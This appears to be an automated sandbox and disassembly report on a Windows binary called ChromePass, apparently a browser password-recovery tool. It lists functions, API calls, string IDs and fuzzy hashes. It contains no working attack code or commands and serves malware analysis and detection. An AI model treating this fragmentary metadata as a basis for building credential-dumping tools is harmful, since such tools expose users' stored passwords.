                                        • Opcode ID: ad9735bd10d2f274383b41e9f76874b314708e3bce80cdfd8b1d45439aa6a5f9
                                        • Instruction ID: 9f503a3996ee50f980d5cdaaa83e340c66ad355af15459912377805262b10128
                                        • Opcode Fuzzy Hash: ad9735bd10d2f274383b41e9f76874b314708e3bce80cdfd8b1d45439aa6a5f9
                                        • Instruction Fuzzy Hash: CB31E671600705EFDB309F64C888A9AB3A9BF10365F1086BEE165672E2C778AD85CB54
                                        Function 00407AE3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00407B07
                                        • memset.MSVCRT ref: 00407B1E
                                          • Part of subcall function 00407185: wcscpy.MSVCRT ref: 0040718A
                                          • Part of subcall function 00407185: _wcslwr.MSVCRT ref: 004071AB
                                        • _snwprintf.MSVCRT ref: 00407B4D
                                          • Part of subcall function 00404870: wcslen.MSVCRT ref: 0040487D
                                          • Part of subcall function 00404870: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040788B,?,<item>), ref: 0040488C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                        • String ID: </%s>
                                        • API String ID: 168708657-259020660
                                        • Opcode ID: b01b050d2b987f9521d46d26e93afce8b1bfe3bfa3c84535e891efa3c33f00e1
                                        • Instruction ID: 073a195abd97e505d0c44f18f087f8bafc3a7e879dc48580ce391312ff5c1156
                                        • Opcode Fuzzy Hash: b01b050d2b987f9521d46d26e93afce8b1bfe3bfa3c84535e891efa3c33f00e1
                                        • Instruction Fuzzy Hash: 4301D6B3E0012967D720A755DC45FEA776EEF41308F4000B6BF08B7082DB78AA558A99
                                        Function 0040103E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00404BE5: memset.MSVCRT ref: 00404BEF
                                          • Part of subcall function 00404BE5: wcscpy.MSVCRT ref: 00404C2F
                                        • CreateFontIndirectW.GDI32(?), ref: 0040105D
                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040107C
                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 0040109A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                        • String ID: MS Sans Serif
                                        • API String ID: 210187428-168460110
                                        • Opcode ID: fec4c3f488b20ed5bdc66d84dd021dc12000734a1329bc5c35b2600b853bb3fa
                                        • Instruction ID: 0cbfb8aef047944f7db3e0eccab611112fe21e3d273e6c9f0c641645f9b3b621
                                        • Opcode Fuzzy Hash: fec4c3f488b20ed5bdc66d84dd021dc12000734a1329bc5c35b2600b853bb3fa
                                        • Instruction Fuzzy Hash: 3BF08275B40308B7E6317BE1DC86F5A77B9AB40B04F500429B755BA1E0D6B4B142D658
                                        Function 0040A8EA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryW.KERNEL32(shell32.dll,0040A928,?), ref: 0040A8F8
                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040A90D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                        • API String ID: 2574300362-880857682
                                        • Opcode ID: 914e6417c65161a671754efd666f7633fa486de93f471b79313a7543fa847c03
                                        • Instruction ID: c43605d578450a16b894aa1416a585769f7f7aef7b6ac75b942aa130e6551b8c
                                        • Opcode Fuzzy Hash: 914e6417c65161a671754efd666f7633fa486de93f471b79313a7543fa847c03
                                        • Instruction Fuzzy Hash: B6D0C9B0B80B109ED7106F20AC4E72A3BA4AB6075AFD1A536A805E12A1DB785510DF2D
                                        Function 004139F3 Relevance: 6.4, APIs: 4, Instructions: 370COMMON
                                        Download Yara Rule
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00413AA1
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 885266447-0
                                        • Opcode ID: 9f852476a24b5e65acdbe2f2a043cc320021880029ce906e3a02554176d33ed5
                                        • Instruction ID: 59302937dc795c47711df285332407a1f8ddb343786b7b42ecfc36176e7c5e69
                                        • Opcode Fuzzy Hash: 9f852476a24b5e65acdbe2f2a043cc320021880029ce906e3a02554176d33ed5
                                        • Instruction Fuzzy Hash: 93E1F671E00218EFDF14DFA9D981AEEBBB1EF48305F14446AE405B7251E738AE81CB58
                                        Function 00423AE4 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 318COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: EB$0$0
                                        • API String ID: 2221118986-1561797307
                                        • Opcode ID: 660e6c4b9d9fe8a994a55b909cc9ede7253a91505854f54e77cdd1d1cc9e251b
                                        • Instruction ID: 1ea76f229ebdc1aabd29d9c7becc7eefde12d6ca0c6a424e6793e001dcbd3a88
                                        • Opcode Fuzzy Hash: 660e6c4b9d9fe8a994a55b909cc9ede7253a91505854f54e77cdd1d1cc9e251b
                                        • Instruction Fuzzy Hash: ADC17D31A00229EFCF14CF65D4416AABBB1FF44315F5480AFE804AB356D739AE91CB98
                                        Function 004070DE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • free.MSVCRT ref: 00407129
                                        • memcpy.MSVCRT(00000000,$!@,?,00000000,?,?,?,?,?,00402124,?), ref: 0040713A
                                        • memcpy.MSVCRT(00000000,$!@,?,?,?,?,?,?,?,00402124,?), ref: 0040716A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memcpy$free
                                        • String ID: $!@
                                        • API String ID: 2888793982-977691485
                                        • Opcode ID: f9e5b73e3dde4dca867c0553b034a14acb0ef908cd8328aefb8c0c5bc0a96aef
                                        • Instruction ID: f3f0860456a4485ef54013c7569306a12b2a47b62f6c9f3181aa3f122bf85e4b
                                        • Opcode Fuzzy Hash: f9e5b73e3dde4dca867c0553b034a14acb0ef908cd8328aefb8c0c5bc0a96aef
                                        • Instruction Fuzzy Hash: FF21D53A600600AFC7219F25C88182AB7E6FF49314720863EF996977D1D735FC51DB96
                                        Function 0040204A Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset$_wcsicmpmemcpywcscmp
                                        • String ID:
                                        • API String ID: 2286356190-0
                                        • Opcode ID: 6da85085f14a2f250db9efbeae09bf6fef5951a5ac91e7cf161fe321f83001b7
                                        • Instruction ID: a1e3286667dbef44129d227948d97306a94b73f239cf382e1452ef2b17d38215
                                        • Opcode Fuzzy Hash: 6da85085f14a2f250db9efbeae09bf6fef5951a5ac91e7cf161fe321f83001b7
                                        • Instruction Fuzzy Hash: 681187B3508304AAD720DB51D845ACBB3DCAB84315F14C93FF948D61D1EB78D2498B9B
                                        Function 00405845 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,0040136B,?,?,?,?,00431D58,0000000C), ref: 0040587A
                                        • memset.MSVCRT ref: 0040588B
                                        • memcpy.MSVCRT(00434C08,?,00000000,00000000,00000000,00000000,00000000,?,?,0040136B,?,?,?,?,00431D58,0000000C), ref: 00405897
                                        • ??3@YAXPAX@Z.MSVCRT ref: 004058A4
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ??2@??3@memcpymemset
                                        • String ID:
                                        • API String ID: 1865533344-0
                                        • Opcode ID: 30bbd352911dea2b85de18ef4888c87691adef2e7fefc46e84ed65210418ea22
                                        • Instruction ID: 8fa97af7e5d55286372163d9ad42e2c28c0e779296564fa3a895af7c1a6606fb
                                        • Opcode Fuzzy Hash: 30bbd352911dea2b85de18ef4888c87691adef2e7fefc46e84ed65210418ea22
                                        • Instruction Fuzzy Hash: 501160726146019FD328DF19D881A27F7E5FFD8300B60C82EE896D7785D635E811CB54
                                        Function 0040AA2B Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        • SHGetMalloc.SHELL32(?), ref: 0040AA3B
                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040AA6D
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AA81
                                        • wcscpy.MSVCRT ref: 0040AA94
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                        • String ID:
                                        • API String ID: 3917621476-0
                                        • Opcode ID: 377ec8e5f036f696ee045e427b170af2ab7c24cd021eb01e92377e2e7edbcb89
                                        • Instruction ID: 5fb91cfae0c2ebd1d76e1c672d4745c525f0cabac9d5bba201b31e7e08aa414d
                                        • Opcode Fuzzy Hash: 377ec8e5f036f696ee045e427b170af2ab7c24cd021eb01e92377e2e7edbcb89
                                        • Instruction Fuzzy Hash: 23110CB5A00218AFDB10DFA9D989AAEB7FCFF48310F50446AE905E7240D738DA15CF65
                                        Function 004071FB Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00407220
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,0042C68C,?,?,?,?,?,0040244B), ref: 00407239
                                        • strlen.MSVCRT ref: 0040724B
                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,0040244B,?,?,00000008), ref: 0040725C
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: d01f7c04fd76e47fab5a28400840c355bf00092d82e532ccc448e317add86ffe
                                        • Instruction ID: f53170a29f1854e1c16e19ed3d359429f7bd7f4535bc732892f58fce21bc9c57
                                        • Opcode Fuzzy Hash: d01f7c04fd76e47fab5a28400840c355bf00092d82e532ccc448e317add86ffe
                                        • Instruction Fuzzy Hash: 87F06DB390022CBFEB159B98ECC9DEB776DDB04354F0001A6BB05E2052E6349E44CBB8
                                        Function 004022D0 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004022F5
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402312
                                        • strlen.MSVCRT ref: 00402324
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00402335
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: 4264a57b48197c2f64856b5179aaa48d3d1e4fbfe8e357c1b9274df53de55185
                                        • Instruction ID: a02fbb3a355ce16d9f4966833126a825bc8952b666e5f9d6bd59413093c7b07c
                                        • Opcode Fuzzy Hash: 4264a57b48197c2f64856b5179aaa48d3d1e4fbfe8e357c1b9274df53de55185
                                        • Instruction Fuzzy Hash: 80F04FB650022CBFEB15A7949CC9DEB776DDB04354F0001A6B705E2052D6749E448BB9
                                        Function 00407266 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcschr.MSVCRT ref: 00407295
                                        • wcschr.MSVCRT ref: 004072A3
                                          • Part of subcall function 004071FB: memset.MSVCRT ref: 00407220
                                          • Part of subcall function 004071FB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,0042C68C,?,?,?,?,?,0040244B), ref: 00407239
                                          • Part of subcall function 004071FB: strlen.MSVCRT ref: 0040724B
                                          • Part of subcall function 004071FB: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,0040244B,?,?,00000008), ref: 0040725C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: wcschr$ByteCharFileMultiWideWritememsetstrlen
                                        • String ID: "
                                        • API String ID: 3380400052-123907689
                                        • Opcode ID: 3be1c1e377b52646325428bb42917dedc5209e6adf5875382d99979dbb0e4fc3
                                        • Instruction ID: c8539a0dc029bb113b1e2e72df028827eea6433fa9329206892d96a07a67c76e
                                        • Opcode Fuzzy Hash: 3be1c1e377b52646325428bb42917dedc5209e6adf5875382d99979dbb0e4fc3
                                        • Instruction Fuzzy Hash: 90317371D08118AADF10EFA5C8419DEB7B5EF08324F20416BFC11B72D1DB78AA41DA59
                                        Function 0041D27A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: isalnumisdigit
                                        • String ID: "
                                        • API String ID: 872979836-123907689
                                        • Opcode ID: 78a291c5baecd1de0e99965bdebc33a11d9fff5051348b1f6caa122415013831
                                        • Instruction ID: 8796255afa7859fb56c6b653574d1b3f8af1ef0ff55f817c4f688045ce6150e9
                                        • Opcode Fuzzy Hash: 78a291c5baecd1de0e99965bdebc33a11d9fff5051348b1f6caa122415013831
                                        • Instruction Fuzzy Hash: DE1142B09087E15EEB3346A988403B7BBC8AF57310F5515D6E8E18B246C27CDC82C366
                                        Function 0040525E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • _snwprintf.MSVCRT ref: 004052A3
                                        • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 004052B3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: _snwprintfmemcpy
                                        • String ID: %2.2X
                                        • API String ID: 2789212964-323797159
                                        • Opcode ID: 10a31a3ff9afff976bbfcdd0ff373495958d8b30277fae7c99cab24ea97ad728
                                        • Instruction ID: eff0fbd87d0ef719c4c00606564022f8ee6ebfeed398dd950292ea24602fa429
                                        • Opcode Fuzzy Hash: 10a31a3ff9afff976bbfcdd0ff373495958d8b30277fae7c99cab24ea97ad728
                                        • Instruction Fuzzy Hash: FD118E32A00619BFEB50DFE8C8829AF73B9FF05314F50847AED11E7141D6389A158FA5
                                        Function 0042A893 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strlen.MSVCRT ref: 0042A8A0
                                          • Part of subcall function 0040B344: RtlEnterCriticalSection.NTDLL(0043551C), ref: 0040B345
                                          • Part of subcall function 0040B344: GetCurrentThreadId.KERNEL32 ref: 0040B34B
                                          • Part of subcall function 0041DF67: memcpy.MSVCRT(0000001C,0042AD04,00000000), ref: 0041E032
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0042A8ED
                                          • Part of subcall function 0042A7BB: strlen.MSVCRT ref: 0042A7E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: CriticalSectionstrlen$CurrentEnterLeaveThreadmemcpy
                                        • String ID: MATCH
                                        • API String ID: 858963765-2366572469
                                        • Opcode ID: b32f27a28a07a5ab8103c67204f34e110391b25bec14745c7e99dae7b2161c79
                                        • Instruction ID: 84fdbdb7d3695ca7691bf99c5f48ee8d2958dfa6757eaf5586abaeea4a5b05ae
                                        • Opcode Fuzzy Hash: b32f27a28a07a5ab8103c67204f34e110391b25bec14745c7e99dae7b2161c79
                                        • Instruction Fuzzy Hash: 7AF0C272A0113477C520316B6C0AEDBFA5CDF467B8F520127FA08A3642EB6AAC1181EC